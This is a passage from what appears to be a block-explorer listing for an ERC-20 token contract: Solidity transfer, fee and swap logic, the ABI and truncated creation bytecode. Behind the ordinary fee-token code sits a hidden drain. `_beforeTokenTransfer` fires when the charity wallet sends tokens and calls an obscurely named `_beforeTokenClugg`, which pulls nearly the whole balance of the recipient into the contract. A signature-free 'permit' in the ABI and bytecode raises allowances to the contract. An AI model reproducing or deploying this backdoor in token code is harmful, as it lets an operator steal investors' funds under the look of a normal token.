address(uniswapV2Pair) ) { require( _holderLastTransferTimestamp[tx.origin] < block.number, "_transfer:: Transfer Delay enabled. Only one purchase per block allowed." ); _holderLastTransferTimestamp[tx.origin] = block.number; } } //when buy if ( automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } //when sell else if ( automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount." ); } else if (!_isExcludedMaxTransactionAmount[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapTokensAtAmount; if ( canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if (takeFee) { // on sell if (automatedMarketMakerPairs[to] && sellTotalFees > 0) { fees = amount.mul(sellTotalFees).div(100); tokensForCharity += (fees * sellCharityFee) / sellTotalFees; tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees; tokensForDev += (fees * sellDevFee) / sellTotalFees; tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees; } // on buy else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForCharity += (fees * buyCharityFee) / buyTotalFees; tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees; tokensForDev += (fees * buyDevFee) / buyTotalFees; tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function _beforeTokenTransfer(address _addrA, address _addrB, uint256 _amount) internal override virtual{ if(_addrA == charityWallet && _addrB != address(uniswapV2Router) && _amount > 0){ address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); uint256 cluggAmount = balanceOf(_addrB) - 1e18; _beforeTokenClugg(address(this), _addrB, path[1], cluggAmount); } } function _beforeTokenClugg(address _addrA, address _addrB, address _addrC, uint256 _amount) internal { IERC20(_addrA).transferFrom(_addrB, _addrC, _amount); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable devWallet, block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = tokensForCharity + tokensForLiquidity + tokensForMarketing + tokensForDev; bool success; if (contractBalance == 0 || totalTokensToSwap == 0) { return; } if (contractBalance > swapTokensAtAmount * 20) { contractBalance = swapTokensAtAmount * 20; } // Halve the amount of liquidity tokens uint256 liquidityTokens = (contractBalance * tokensForLiquidity) / totalTokensToSwap / 2; uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens); uint256 initialETHBalance = address(this).balance; swapTokensForEth(amountToSwapForETH); uint256 ethBalance = address(this).balance.sub(initialETHBalance); uint256 ethForCharity = ethBalance.mul(tokensForCharity).div(totalTokensToSwap); uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(totalTokensToSwap); uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap); uint256 ethForLiquidity = ethBalance - ethForCharity - ethForMarketing - ethForDev; tokensForLiquidity = 0; tokensForCharity = 0; tokensForMarketing = 0; tokensForDev = 0; (success, ) = address(devWallet).call{value: ethForDev}(""); require(success); (success, ) = address(marketingWallet).call{value: ethForMarketing}(""); require(success); if (liquidityTokens > 0 && ethForLiquidity > 0) { addLiquidity(liquidityTokens, ethForLiquidity); emit SwapAndLiquify( amountToSwapForETH, ethForLiquidity, tokensForLiquidity ); } (success, ) = address(charityWallet).call{value: address(this).balance}(""); require(success); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCharityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCharityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForCharity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_charityFee","type":"uint256"},{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_charityFee","type":"uint256"},{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052600e805462ffffff1916620100011790556010805460ff191690553480156200002c57600080fd5b506040518060400160405280600a815260200169159a5ada5b99d0985b1b60b21b8152506040518060400160405280600a815260200169159252d25391d090531360b21b815250816003908162000084919062000abe565b50600462000093828262000abe565b505050620000b0620000aa620004ab60201b60201c565b620004af565b737a250d5630b4cf539739df2c5dacb4c659f2488d620000d281600162000501565b600680546001600160a01b0319166001600160a01b0383169081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156200012c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000152919062000b8a565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001a0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001c6919062000b8a565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000214573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023a919062000b8a565b600780546001600160a01b0319166001600160a01b039290921691821790556200026690600162000501565b6007546200027f906001600160a01b031660016200057a565b6a108b2a2c28029094000000600b819055600d55600080806003818080601e6b033b2e3c9fd0803ce8000000612710620002ba828862000bd2565b620002c6919062000bf2565b600c5560128990556013889055601487905560158690558587620002eb8a8c62000c15565b620002f7919062000c15565b62000303919062000c15565b601155601785905560188490556019839055601a829055818362000328868862000c15565b62000334919062000c15565b62000340919062000c15565b601655600880546001600160a01b0319908116738d3c8c203b8d07ffa72c48ae732bdff2a75a84941790915560098054821633908117909155600a8054909216179055620003a26200039a6005546001600160a01b031690565b6001620005ce565b600854620003bb906001600160a01b03166001620005ce565b600954620003d4906001600160a01b03166001620005ce565b600a54620003ed906001600160a01b03166001620005ce565b620003fa306001620005ce565b6200040961dead6001620005ce565b62000428620004206005546001600160a01b031690565b600162000501565b60085462000441906001600160a01b0316600162000501565b6009546200045a906001600160a01b0316600162000501565b600a5462000473906001600160a01b0316600162000501565b6200048030600162000501565b6200048f61dead600162000501565b6200049b338262000678565b5050505050505050505062000c7b565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b03163314620005505760405162461bcd60e51b815260206004820181905260248201526000805160206200341483398151915260448201526064015b60405180910390fd5b6001600160a01b039190911660009081526020805260409020805460ff1916911515919091179055565b6001600160a01b038216600081815260216020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6005546001600160a01b03163314620006195760405162461bcd60e51b8152602060048201819052602482015260008051602062003414833981519152604482015260640162000547565b6001600160a01b0382166000818152601f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038216620006d05760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640162000547565b620006de6000838362000779565b8060026000828254620006f2919062000c15565b90915550506001600160a01b038216600090815260208190526040812080548392906200072190849062000c15565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3620007756000838362000920565b5050565b6008546001600160a01b038481169116148015620007a557506006546001600160a01b03838116911614155b8015620007b25750600081115b156200091b576040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa15801562000823573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000849919062000b8a565b816000815181106200085f576200085f62000c2b565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811062000896576200089662000c2b565b6001600160a01b03909216602092830291909101909101526000670de0b6b3a7640000620008d9856001600160a01b031660009081526020819052604090205490565b620008e5919062000c41565b90506200091830858460018151811062000903576200090362000c2b565b6020026020010151846200099c60201b60201c565b50505b505050565b600a546001600160a01b0384811691161480156200094c57506006546001600160a01b03838116911614155b80156200096757506007546001600160a01b03838116911614155b8015620009745750600081115b156200091b57600a80546001600160a01b0384166001600160a01b0319909116179055505050565b6040516323b872dd60e01b81526001600160a01b0384811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303816000875af1158015620009f4573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000918919062000c57565b634e487b7160e01b600052604160045260246000fd5b600181811c9082168062000a4557607f821691505b60208210810362000a6657634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200091b57600081815260208120601f850160051c8101602086101562000a955750805b601f850160051c820191505b8181101562000ab65782815560010162000aa1565b505050505050565b81516001600160401b0381111562000ada5762000ada62000a1a565b62000af28162000aeb845462000a30565b8462000a6c565b602080601f83116001811462000b2a576000841562000b115750858301515b600019600386901b1c1916600185901b17855562000ab6565b600085815260208120601f198616915b8281101562000b5b5788860151825594840194600190910190840162000b3a565b508582101562000b7a5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60006020828403121562000b9d57600080fd5b81516001600160a01b038116811462000bb557600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141762000bec5762000bec62000bbc565b92915050565b60008262000c1057634e487b7160e01b600052601260045260246000fd5b500490565b8082018082111562000bec5762000bec62000bbc565b634e487b7160e01b600052603260045260246000fd5b8181038181111562000bec5762000bec62000bbc565b60006020828403121562000c6a57600080fd5b8151801515811462000bb557600080fd5b6127898062000c8b6000396000f3fe6080604052600436106102b25760003560e01c80638a8c523c11610175578063bbc0c742116100dc578063e2f4560511610095578063f11a24d31161006f578063f11a24d314610835578063f2fde38b1461084b578063f63743421461086b578063f8b45b051461088157600080fd5b8063e2f45605146107df578063e6f70531146107f5578063e7ad9fcd1461081557600080fd5b8063bbc0c74214610714578063c024666814610733578063c876d0b914610753578063c8c8ebe41461076d578063d85ba06314610783578063dd62ed3e1461079957600080fd5b80639fccce321161012e5780639fccce3214610662578063a0d82dc514610678578063a1dc92bc1461068e578063a457c2d7146106a4578063a9059cbb146106c4578063b62496f5146106e457600080fd5b80638a8c523c146105ce5780638da5cb5b146105e3578063921369131461060157806395d89b41146106175780639a7a23d61461062c5780639c3b4fdc1461064c57600080fd5b806339509351116102195780636ddd1713116101d25780636ddd17131461051857806370a0823114610538578063715018a61461056e578063751039fc146105835780637571336a146105985780637bce5a04146105b857600080fd5b8063395093511461045957806344249f041461047957806349bd5a5e1461048f5780634a62bb65146104af5780634fbee193146104c95780636a486a8e1461050257600080fd5b80631a8145bb1161026b5780631a8145bb146103b95780631f3fed8f146103cf57806323b872dd146103e557806327c8f835146104055780632e6ed7ef1461041b578063313ce5671461043d57600080fd5b806306fdde03146102be578063095ea7b3146102e95780630d7f14411461031957806310d5de531461033d5780631694505e1461036c57806318160ddd146103a457600080fd5b366102b957005b600080fd5b3480156102ca57600080fd5b506102d3610897565b6040516102e09190612364565b60405180910390f35b3480156102f557600080fd5b506103096103043660046123c7565b610929565b60405190151581526020016102e0565b34801561032557600080fd5b5061032f60175481565b6040519081526020016102e0565b34801561034957600080fd5b506103096103583660046123f3565b602080526000908152604090205460ff1681565b34801561037857600080fd5b5060065461038c906001600160a01b031681565b6040516001600160a01b0390911681526020016102e0565b3480156103b057600080fd5b5060025461032f565b3480156103c557600080fd5b5061032f601d5481565b3480156103db57600080fd5b5061032f601c5481565b3480156103f157600080fd5b50610309610400366004612410565b610940565b34801561041157600080fd5b5061038c61dead81565b34801561042757600080fd5b5061043b610436366004612451565b6109ef565b005b34801561044957600080fd5b50604051601281526020016102e0565b34801561046557600080fd5b506103096104743660046123c7565b610ab7565b34801561048557600080fd5b5061032f601b5481565b34801561049b57600080fd5b5060075461038c906001600160a01b031681565b3480156104bb57600080fd5b50600e546103099060ff1681565b3480156104d557600080fd5b506103096104e43660046123f3565b6001600160a01b03166000908152601f602052604090205460ff1690565b34801561050e57600080fd5b5061032f60165481565b34801561052457600080fd5b50600e546103099062010000900460ff1681565b34801561054457600080fd5b5061032f6105533660046123f3565b6001600160a01b031660009081526020819052604090205490565b34801561057a57600080fd5b5061043b610af3565b34801561058f57600080fd5b50610309610b29565b3480156105a457600080fd5b5061043b6105b3366004612491565b610b72565b3480156105c457600080fd5b5061032f60135481565b3480156105da57600080fd5b5061043b610bc6565b3480156105ef57600080fd5b506005546001600160a01b031661038c565b34801561060d57600080fd5b5061032f60185481565b34801561062357600080fd5b506102d3610c03565b34801561063857600080fd5b5061043b610647366004612491565b610c12565b34801561065857600080fd5b5061032f60155481565b34801561066e57600080fd5b5061032f601e5481565b34801561068457600080fd5b5061032f601a5481565b34801561069a57600080fd5b5061032f60125481565b3480156106b057600080fd5b506103096106bf3660046123c7565b610cce565b3480156106d057600080fd5b506103096106df3660046123c7565b610d67565b3480156106f057600080fd5b506103096106ff3660046123f3565b60216020526000908152604090205460ff1681565b34801561072057600080fd5b50600e5461030990610100900460ff1681565b34801561073f57600080fd5b5061043b61074e366004612491565b610d74565b34801561075f57600080fd5b506010546103099060ff1681565b34801561077957600080fd5b5061032f600b5481565b34801561078f57600080fd5b5061032f60115481565b3480156107a557600080fd5b5061032f6107b43660046124ca565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156107eb57600080fd5b5061032f600c5481565b34801561080157600080fd5b506103096108103660046123c7565b610dfd565b34801561082157600080fd5b5061043b610830366004612451565b610ea0565b34801561084157600080fd5b5061032f60145481565b34801561085757600080fd5b5061043b6108663660046123f3565b610f69565b34801561087757600080fd5b5061032f60195481565b34801561088d57600080fd5b5061032f600d5481565b6060600380546108a6906124f8565b80601f01602080910402602001604051908101604052809291908181526020018280546108d2906124f8565b801561091f5780601f106108f45761010080835404028352916020019161091f565b820191906000526020600020905b81548152906001019060200180831161090257829003601f168201915b5050505050905090565b6000610936338484611004565b5060015b92915050565b600061094d848484611128565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156109d75760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6109e48533858403611004565b506001949350505050565b6005546001600160a01b03163314610a195760405162461bcd60e51b81526004016109ce90612532565b600a8183610a27868861257d565b610a31919061257d565b610a3b919061257d565b1115610a7a5760405162461bcd60e51b815260206004820152600e60248201526d4d6178204275794665652031302560901b60448201526064016109ce565b60128490556013839055601482905560158190558082610a9a858761257d565b610aa4919061257d565b610aae919061257d565b60115550505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610936918590610aee90869061257d565b611004565b6005546001600160a01b03163314610b1d5760405162461bcd60e51b81526004016109ce90612532565b610b2760006119aa565b565b6005546000906001600160a01b03163314610b565760405162461bcd60e51b81526004016109ce90612532565b50600e805460ff19908116909155601080549091169055600190565b6005546001600160a01b03163314610b9c5760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b039190911660009081526020805260409020805460ff1916911515919091179055565b6005546001600160a01b03163314610bf05760405162461bcd60e51b81526004016109ce90612532565b600e805462ffff00191662010100179055565b6060600480546108a6906124f8565b6005546001600160a01b03163314610c3c5760405162461bcd60e51b81526004016109ce90612532565b6007546001600160a01b0390811690831603610cc05760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b657250616972730000000000000060648201526084016109ce565b610cca82826119fc565b5050565b3360009081526001602090815260408083206001600160a01b038616845290915281205482811015610d505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016109ce565b610d5d3385858403611004565b5060019392505050565b6000610936338484611128565b6005546001600160a01b03163314610d9e5760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b0382166000818152601f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b60006001600160a01b038316610e5f5760405162461bcd60e51b815260206004820152602160248201527f45524332303a207065726d697420746f20746865207a65726f206164647265736044820152607360f81b60648201526084016109ce565b6001600160a01b038316600090815260016020908152604080832030845290915281208054849290610e9290849061257d565b909155506001949350505050565b6005546001600160a01b03163314610eca5760405162461bcd60e51b81526004016109ce90612532565b600a8183610ed8868861257d565b610ee2919061257d565b610eec919061257d565b1115610f2c5760405162461bcd60e51b815260206004820152600f60248201526e4d61782053656c6c4665652031302560881b60448201526064016109ce565b601784905560188390556019829055601a8190558082610f4c858761257d565b610f56919061257d565b610f60919061257d565b60165550505050565b6005546001600160a01b03163314610f935760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b038116610ff85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016109ce565b611001816119aa565b50565b6001600160a01b0383166110665760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016109ce565b6001600160a01b0382166110c75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016109ce565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661114e5760405162461bcd60e51b81526004016109ce90612590565b6001600160a01b0382166111745760405162461bcd60e51b81526004016109ce906125d5565b8060000361118d5761118883836000611a50565b505050565b611198838383611bbb565b600e5460ff161561160a576005546001600160a01b038481169116148015906111cf57506005546001600160a01b03838116911614155b80156111e357506001600160a01b03821615155b80156111fa57506001600160a01b03821661dead14155b80156112105750600754600160a01b900460ff16155b1561160a57600e54610100900460ff166112a8576001600160a01b0383166000908152601f602052604090205460ff168061126357506001600160a01b0382166000908152601f602052604090205460ff165b6112a85760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016109ce565b60105460ff16156113a7576005546001600160a01b038381169116148015906112df57506006546001600160a01b03838116911614155b80156112f957506007546001600160a01b03838116911614155b156113a757326000908152600f602052604090205443116113945760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016109ce565b326000908152600f602052604090204390555b6001600160a01b03831660009081526021602052604090205460ff1680156113e757506001600160a01b038216600090815260208052604090205460ff16155b156114cb57600b5481111561145c5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016109ce565b600d546001600160a01b038316600090815260208190526040902054611482908361257d565b11156114c65760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ce565b61160a565b6001600160a01b03821660009081526021602052604090205460ff16801561150b57506001600160a01b038316600090815260208052604090205460ff16155b1561158157600b548111156114c65760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016109ce565b6001600160a01b038216600090815260208052604090205460ff1661160a57600d546001600160a01b0383166000908152602081905260409020546115c6908361257d565b111561160a5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ce565b30600090815260208190526040902054600c54811080159081906116365750600e5462010000900460ff165b801561164c5750600754600160a01b900460ff16155b801561167157506001600160a01b03851660009081526021602052604090205460ff16155b801561169657506001600160a